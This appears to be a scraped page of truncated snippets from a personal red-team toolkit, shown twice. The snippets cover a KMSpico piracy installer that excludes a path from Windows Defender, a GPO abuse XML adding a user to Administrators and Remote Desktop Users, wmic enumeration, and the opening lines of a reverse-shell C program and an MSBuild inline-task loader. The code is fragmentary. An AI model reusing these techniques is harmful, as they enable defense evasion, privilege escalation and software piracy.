brax braaaax

## procmon.sh
#!/bin/bash
# via ippsec

IFS=$'\n'
old_process=$(ps -eo command)

while true; do
  new_process=$(ps -eo command)
  diff <(echo "$old_process") <(echo "$new_process") |grep [\<\>]
  sleep 1

## post.sh
#!/bin/bash

if ! [ $(id -u) = 0 ]
then
  echo "Run as root"
  exit 1
fi

if [ -e ~/.xmodmaprc ];then
  xmodmap ~/.xmodmaprc

## install_KMSpico.ps1
$KMSUrl = "https://codeload.github.com/charygao/KMSpico_v10.2.0/zip/master"
$KMSDst = "C:\windows\temp\KMSpico.zip"
$KMSUnzip = "C:\windows\temp\KMSPico"
$KMSExe = "C:\Windows\Temp\KMSPico\KMSpico_v10.2.0-master\KMSpico Portable\AutoPico.exe"

if ((Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Windows 10" -or (Get-CimInstance -ClassName Win32_OperatingSystem).name -match  "Server 2016") {

Write-Host "Temporarily disabling Windows Defender Real time Scanning"
Set-MpPreference -ExclusionPath C:\temp\windows\

## Get-KerberosKeytab.ps1
param(
    [Parameter(Mandatory)]
    [string]$Path
)

#Created by Pierre.Audonnet@microsoft.com
#
#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
#
#  keytab {

## gpo abuse
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)" image="2" changed="2019-03-07 17:32:24" uid="{ECC42B3A-5D61-4705-BC17-467C4A2764DE}"><Properties action="U" newName="" description="GPP - admins" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-544" groupName="Administrators (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-1302490888-793887298-1113"/></Members></Properties></Group>
	<Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Remote Desktop Users (built-in)" image="2" changed="2019-03-07 17:33:38" uid="{5F8E65C1-F1BA-4207-8549-5D6606F8E7DF}"><Properties action="U" newName="" description="gpp - add chry rdp" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-555" groupName="Remote Desktop Users (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-130

## wmic_cmds.txt
Host Enumeration:

--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

wmic computersystem LIST full

--- Anti-Virus ---

wmic /namespace:\\root\securitycenter2 path antivirusproduct

## reverse.c
/* compile: i686-w64-mingw32-gcc -o brax.exe reverse.c -lws2_32 */

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "w2_32")

WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;

## aes_encrypt.go
package main

import (
        "bufio"
        "bytes"

## brax.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="0xtaco">
    <Brax />
  </Target>
  <UsingTask
    TaskName="Brax"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Code Type="Class" Language="cs">

## substitute.ps1
$payload =  "hi mom"
[string]$output = ""
$payload.ToCharArray() | %{
 [string]$thischar = [byte][char]$_ + 17
 if($thischar.Length -eq 1)
 {
 $thischar = [string]"00" + $thischar
 $output += $thischar
 }
 elseif($thischar.Length -eq 2)
	#!/bin/bash
	# via ippsec

	IFS=$'\n'
	old_process=$(ps -eo command)

	while true; do
	new_process=$(ps -eo command)
	diff <(echo "$old_process") <(echo "$new_process") \|grep [\<\>]
	sleep 1
	#!/bin/bash

	if ! [ $(id -u) = 0 ]
	then
	echo "Run as root"
	exit 1
	fi

	if [ -e ~/.xmodmaprc ];then
	xmodmap ~/.xmodmaprc
	$KMSUrl = "https://codeload.github.com/charygao/KMSpico_v10.2.0/zip/master"
	$KMSDst = "C:\windows\temp\KMSpico.zip"
	$KMSUnzip = "C:\windows\temp\KMSPico"
	$KMSExe = "C:\Windows\Temp\KMSPico\KMSpico_v10.2.0-master\KMSpico Portable\AutoPico.exe"

	if ((Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Windows 10" -or (Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Server 2016") {

	Write-Host "Temporarily disabling Windows Defender Real time Scanning"
	Set-MpPreference -ExclusionPath C:\temp\windows\
	param(
	[Parameter(Mandatory)]
	[string]$Path
	)

	#Created by Pierre.Audonnet@microsoft.com
	#
	#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
	#
	# keytab {
	<?xml version="1.0" encoding="utf-8"?>
	<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)" image="2" changed="2019-03-07 17:32:24" uid="{ECC42B3A-5D61-4705-BC17-467C4A2764DE}"><Properties action="U" newName="" description="GPP - admins" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-544" groupName="Administrators (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-1302490888-793887298-1113"/></Members></Properties></Group>
	<Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Remote Desktop Users (built-in)" image="2" changed="2019-03-07 17:33:38" uid="{5F8E65C1-F1BA-4207-8549-5D6606F8E7DF}"><Properties action="U" newName="" description="gpp - add chry rdp" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-555" groupName="Remote Desktop Users (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-130
	Host Enumeration:

	--- OS Specifics ---
	wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

	wmic computersystem LIST full

	--- Anti-Virus ---

	wmic /namespace:\\root\securitycenter2 path antivirusproduct
	/* compile: i686-w64-mingw32-gcc -o brax.exe reverse.c -lws2_32 */

	#include <winsock2.h>
	#include <stdio.h>

	#pragma comment(lib, "w2_32")

	WSADATA wsaData;
	SOCKET Winsock;
	SOCKET Sock;
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<Target Name="0xtaco">
	<Brax />
	</Target>
	<UsingTask
	TaskName="Brax"
	TaskFactory="CodeTaskFactory"
	AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<Task>
	<Code Type="Class" Language="cs">
	$payload = "hi mom"
	[string]$output = ""
	$payload.ToCharArray() \| %{
	[string]$thischar = [byte][char]$_ + 17
	if($thischar.Length -eq 1)
	{
	$thischar = [string]"00" + $thischar
	$output += $thischar
	}
	elseif($thischar.Length -eq 2)